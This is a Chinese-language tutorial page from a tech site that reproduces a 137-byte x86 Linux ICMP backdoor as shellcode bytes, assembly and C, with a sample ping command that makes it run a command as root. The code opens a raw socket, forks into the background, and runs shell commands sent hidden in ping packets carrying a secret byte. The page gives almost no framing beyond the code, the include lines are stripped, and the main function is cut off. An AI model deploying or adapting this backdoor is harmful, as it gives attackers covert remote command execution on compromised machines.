当前位置:  首页  >  服务器技术  >  Linux/unix  >  Linux教程

LinuxICMP后门代码

文章标题:LinuxICMP后门代码。Linux是中国IT实验室的一个技术频道。包含桌面应用,Linux系统管理,内核研究,嵌入式系统和开源等一些基本分类

  在不少协议的应用都存在着一些后门。例如我们今天将要介绍的Linux ICMP的后门。那么下面我们就来详细看一下关于137字节的Linux远程ICMP后门的具体内容。使用Ping控制程序:

  /*

  x86 linux icmp bind shellcode (137 bytes) by gloomy@netric.org

  [example]

  main:/home/gloomy/security/shellcode/linux/icmp# ./icmp

  Size of shellcode = 137

  main:/home/gloomy/security/shellcode/linux/icmp# ping -p 992f7573722f62696e2f69643e6f7574 -c 1 -s 26 localhost

  PATTERN: 0x992f7573722f62696e2f69643e6f7574 (\x99/usr/bin/id>out)

  34 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.5 ms

  main:/home/gloomy/security/shellcode/linux/icmp# cat out

  uid=0(root) gid=0(root) groups=0(root)

  main:/home/gloomy/security/shellcode/linux/icmp#

  */

  #include

  #include

  #include

  #include

  #define SECRET_CHAR "\x99"

  char shell[] =

  "\x31\xc0\x31\xdb\x31\xc9\xb0\x66"

  "\x43\x41\x51\xb1\x03\x51\x49\x51"

  "\x89\xe1\xcd\x80\x89\xc2\xb0\x02"

  "\xcd\x80\x31\xdb\x39\xc3\x75\x55"

  "\x31\xc0\x31\xdb\xb0\x10\x50\xb0"

  "\xff\x54\x54\x53\x50\x55\x52\x89"

  "\xe1\xb0\x66\xb3\x0c\xcd\x80\x89"

  "\xe9\x01\xc1\x31\xc0\x88\x41\xfe"

  "\xb0\x25\x01\xc5\xb0" SECRET_CHAR

  "\x32\x45\xff\x75\xd5\xb0\x02\xcd"

  "\x80\x31\xdb\x39\xc3\x74\x25\xeb"

  "\xc9\x31\xc0\x31\xdb\xb3\x02\xb0"

  "\x06\xcd\x80\x5b\x89\xd9\x88\x43"

  "\x07\x80\xc1\x08\x50\x55\x51\x53"

  "\x89\xe1\x99\xb0\x0b\xcd\x80\x31"

  "\xc0\x40\xcd\x80\xe8\xd8\xff\xff"

  "\xff"

  "/bin/sh -c";

  void asm_code() {

  __asm("

  xorl %eax,%eax

  xorl %ebx,%ebx

  xorl %ecx,%ecx

  movb $0x66,%al

  incl %ebx

  incl %ecx

  push %ecx

  movb $0x3,%cl

  push %ecx

  decl %ecx

  push %ecx

  movl %esp,%ecx

  int $0x80 /* socket(); */

  movl %eax,%edx

  movb $0x2,%al

  int $0x80 /* fork(); */

  xorl %ebx,%ebx

  cmpl %eax,%ebx

  jne exit

  endlessloop:

  xorl %eax,%eax

  xorl %ebx,%ebx

  movb $0x10,%al

  push %eax

  movb $0xff,%al

  push %esp

  push %esp

  push %ebx

  push %eax

  push %ebp

  push %edx

  movl %esp,%ecx

  movb $0x66,%al

  movb $0x0c,%bl

  int $0x80 /* recvfrom(); */

  movl %ebp,%ecx

  addl %eax,%ecx

  xorl %eax,%eax

  movb %al,-2(%ecx)

  movb $0x25,%al

  addl %eax,%ebp

  movb $0x99,%al /* SECRET_CHAR */

  xorb -1(%ebp),%al

  jnz endlessloop

  movb $0x2,%al

  int $0x80 /* fork(); */

  xorl %ebx,%ebx

  cmpl %eax,%ebx

  je stack

  jmp endlessloop

  execve:

  xorl %eax,%eax

  xorl %ebx,%ebx

  movb $0x2,%bl

  movb $0x6,%al

  int $0x80 /* close(); */

  pop %ebx

  movl %ebx,%ecx

  movb %al,0x7(%ebx)

  addb $0x8,%cl

  push %eax

  push %ebp

  push %ecx

  push %ebx

  movl %esp,%ecx

  cdq

  movb $0xb,%al

  int $0x80 /* execve(); */

  exit:

  xorl %eax,%eax

  incl %eax

  int $0x80 /* exit(); */

  stack:

  call execve

  .string \"/bin/sh -c\"

  ");

  }

  void c_code() {

  int fd;

  int nb = 0;

  struct sockaddr_in them;

  int them_size = sizeof(struct sockaddr);

  char buf[256];

  char *prog[] = {"/bin/sh","-c",&buf[37],NULL};

  fd = socket(2,3,1);

  if (fork() > 0) exit(0);

  while (1) {

  while (!(nb = recvfrom(fd,buf,255,0,(struct sockaddr *)&them,&them_size)));

  buf[nb-1] = 0;

  if (buf[36] == (char)SECRET_CHAR)

  if (fork() == 0) { close(2); execve(prog[0],prog,NULL); }

  }

  }

  int main(int c,char *v[]) {

  void (*i)();

  i = (void (*)())shell;

  fprintf(stderr,"Size of shellcode = %d\n\n",strlen(shell));

  i();

  return 0;

  那么,具体的Linux ICMP后门查看方法我们就呈现出来了。

吐了个 "CAO" !
扫码关注 PHP1 官方微信号
PHP1.CN | 中国最专业的PHP中文社区 | PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | PHP问答
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved PHP1.CN 第一PHP社区 版权所有